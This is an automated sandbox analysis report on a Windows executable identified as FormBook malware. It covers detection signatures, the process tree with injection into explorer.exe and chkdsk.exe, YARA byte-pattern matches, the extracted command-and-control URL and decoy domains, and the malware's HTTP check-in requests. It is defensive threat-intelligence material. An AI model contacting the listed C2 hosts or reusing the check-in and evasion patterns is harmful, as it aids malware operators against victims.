Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GV8EJooYMIgEnEk.exe

Overview

General Information

Sample Name:GV8EJooYMIgEnEk.exe
Analysis ID:562399
MD5:cf6d4fd3dc8e4751b7f89f857b618ef3
SHA1:15b95f0f1b5785bb7fd3d97757f3eea49d1f6951
SHA256:9689e8e0cf51b8b5c98ddb007636d8acf7e03c9cc8a7bf99aafdaaebae2dfb3a
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • GV8EJooYMIgEnEk.exe (PID: 6024 cmdline: "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe" MD5: CF6D4FD3DC8E4751B7F89F857B618EF3)
    • GV8EJooYMIgEnEk.exe (PID: 1012 cmdline: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe MD5: CF6D4FD3DC8E4751B7F89F857B618EF3)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 5924 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 6380 cmdline: /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cottoneworld.com/cbgo/"], "decoy": ["tablescaperendezvous4two.net", "abktransportllc.net", "roseevision.com", "skategrindingwheels.com", "robux-generator-free.xyz", "yacusi.com", "mgav35.xyz", "paravocecommerce.com", "venkatramanrm.com", "freakyhamster.com", "jenaashoponline.com", "dmozlisting.com", "lorrainekclark.store", "handyman-prime.com", "thecrashingbrains.com", "ukpms.com", "livingstonemines.com", "papeisonline.com", "chrisbakerpr.com", "omnipets.store", "anatox-lab.fr", "missingthered.com", "himalaya-nepalorganic.com", "bitcoin-bot.xyz", "velarusbet78.com", "redesignyourpain.com", "alonetogetherentertainment.com", "sandywalling.com", "solacegolf.com", "charlottesbestroofcompany.com", "stefanybeauty.com", "webarate.com", "experiencedlawfirms.com", "lyfygthj.com", "monoicstudios.com", "rgamming.com", "mintique.pro", "totalwinerewards.com", "praelatusproducts.com", "daniloff.pro", "qmir.digital", "tatasteell.com", "casatowerofficial.com", "sunrisespaandbodywork.com", "mgav66.xyz", "bastnbt.com", "fabiulaezeca.com", "sunmountainautomotive.com", "madgeniustalk.com", "elite-hc.com", "billcurdmusic.net", "foxclothings.com", "adtcmrac.com", "buresdx.com", "tothelaundry.com", "bitconga.com", "onlinebiyoloji.online", "up-trend.store", "kaarlehto.com", "interview.online", "grantgroupproperties.com", "jpmhomes.net", "yinlimine.xyz", "roadtrippings.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.0.GV8EJooYMIgEnEk.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.0.GV8EJooYMIgEnEk.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.GV8EJooYMIgEnEk.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
        3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 26 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cottoneworld.com/cbgo/"], "decoy": ["tablescaperendezvous4two.net", "abktransportllc.net", "roseevision.com", "skategrindingwheels.com", "robux-generator-free.xyz", "yacusi.com", "mgav35.xyz", "paravocecommerce.com", "venkatramanrm.com", "freakyhamster.com", "jenaashoponline.com", "dmozlisting.com", "lorrainekclark.store", "handyman-prime.com", "thecrashingbrains.com", "ukpms.com", "livingstonemines.com", "papeisonline.com", "chrisbakerpr.com", "omnipets.store", "anatox-lab.fr", "missingthered.com", "himalaya-nepalorganic.com", "bitcoin-bot.xyz", "velarusbet78.com", "redesignyourpain.com", "alonetogetherentertainment.com", "sandywalling.com", "solacegolf.com", "charlottesbestroofcompany.com", "stefanybeauty.com", "webarate.com", "experiencedlawfirms.com", "lyfygthj.com", "monoicstudios.com", "rgamming.com", "mintique.pro", "totalwinerewards.com", "praelatusproducts.com", "daniloff.pro", "qmir.digital", "tatasteell.com", "casatowerofficial.com", "sunrisespaandbodywork.com", "mgav66.xyz", "bastnbt.com", "fabiulaezeca.com", "sunmountainautomotive.com", "madgeniustalk.com", "elite-hc.com", "billcurdmusic.net", "foxclothings.com", "adtcmrac.com", "buresdx.com", "tothelaundry.com", "bitconga.com", "onlinebiyoloji.online", "up-trend.store", "kaarlehto.com", "interview.online", "grantgroupproperties.com", "jpmhomes.net", "yinlimine.xyz", "roadtrippings.com"]}
          Multi AV Scanner detection for submitted file
          Source: GV8EJooYMIgEnEk.exeVirustotal: Detection: 60%Perma Link
          Source: GV8EJooYMIgEnEk.exeMetadefender: Detection: 20%Perma Link
          Source: GV8EJooYMIgEnEk.exeReversingLabs: Detection: 62%
          Yara detected FormBook
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.cottoneworld.com/cbgo/Avira URL Cloud: Label: malware
          Source: http://www.casatowerofficial.com/cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5YlfAvira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: GV8EJooYMIgEnEk.exeJoe Sandbox ML: detected
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: GV8EJooYMIgEnEk.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: GV8EJooYMIgEnEk.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: chkdsk.pdbGCTL source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: chkdsk.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: StructuralEqualityCompar.pdb source: GV8EJooYMIgEnEk.exe
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi

          Networking

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 199.59.243.200:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 18.231.72.25:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49821 -> 34.102.136.180:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 166.88.62.202 80
          Source: C:\Windows\explorer.exeDomain query: www.casatowerofficial.com
          Source: C:\Windows\explorer.exeDomain query: www.bitconga.com
          Source: C:\Windows\explorer.exeDomain query: www.totalwinerewards.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.200 80
          Source: C:\Windows\explorer.exeDomain query: www.tothelaundry.com
          Source: C:\Windows\explorer.exeDomain query: www.omnipets.store
          Source: C:\Windows\explorer.exeNetwork Connect: 46.252.151.235 80
          Source: C:\Windows\explorer.exeNetwork Connect: 18.231.72.25 80
          Source: C:\Windows\explorer.exeDomain query: www.webarate.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.experiencedlawfirms.com
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.cottoneworld.com/cbgo/
          Source: Joe Sandbox ViewASN Name: ASSUPERNOVAIT ASSUPERNOVAIT
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: global trafficHTTP traffic detected: GET /cbgo/?Xf3=7nL8&4hPx=7Chnk+6aZrnZKD5hPI2GMOI+n7dvSwdfhhGQh0Quh+scZbPipDWGAiRMNWcFVsP/HL+E HTTP/1.1Host: www.experiencedlawfirms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 HTTP/1.1Host: www.totalwinerewards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf HTTP/1.1Host: www.casatowerofficial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 HTTP/1.1Host: www.bitconga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 HTTP/1.1Host: www.omnipets.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.243.200 199.59.243.200
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 19:59:53 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 28 Jan 2022 20:00:09 GMTContent-Type: text/htmlContent-Length: 275ETag: "61f22041-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
          Source: explorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
